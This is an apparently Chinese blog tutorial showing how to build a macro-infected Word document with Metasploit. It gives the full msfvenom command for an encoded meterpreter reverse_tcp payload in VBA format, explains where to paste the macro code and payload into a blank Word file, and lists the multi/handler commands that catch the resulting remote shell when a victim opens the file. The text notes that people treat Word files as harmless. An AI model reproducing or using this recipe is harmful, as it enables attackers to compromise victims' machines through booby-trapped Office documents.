zoukankan      html  css  js  c++  java
  • MSF——客户端渗透之VBScript感染

    弱点扫描

    根据信息收集的结果搜索漏洞利用模块

    结合外部漏洞扫描系统对大IP地址段进行批量扫描

    误报率、漏报率

    • VNC密码破解

    客户端渗透

    VBScript感染方式

    利用  宏  感染word、excel文档

    绕过某些基于文件类型检查的安全机制

    一般人对word、excel的格式看来是没有安全威胁的,没有防范

    生成Payload

    msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.171.129 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe

    生成的内容分为两个部分,一部分是宏执行的VBA代码,另一部分是Payload

    生成一个空白的word文件

     

    宏名随便输入,然后点击创建,我们拷贝生成的第一部分的内容到这里,然后点击保存

    我们现在再打开  宏  ,可以看到生成了下面几个宏

    然后我们拷贝第二部分,贴到word文档的正文里面,然后保存关闭

    然后在Kali上启动侦听

    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 192.168.171.129
    exploit

    当在Windows启动刚刚的word时,我们就取得shell了

  • 相关阅读:
    域名系统
    DNS域名解析过程
    服务器常用的状态码
    重绘与重排及它的性能优化
    console.time和console.timeEnd用法
    用CSS开启硬件加速来提高网站性能
    公钥和私钥
    svn conflict 冲突解决
    svn分支开发与主干合并(branch & merge)
    源生js惯性滚动与回弹效果
  • 原文地址:https://www.cnblogs.com/dogecheng/p/11548046.html
Copyright © 2011-2022 走看看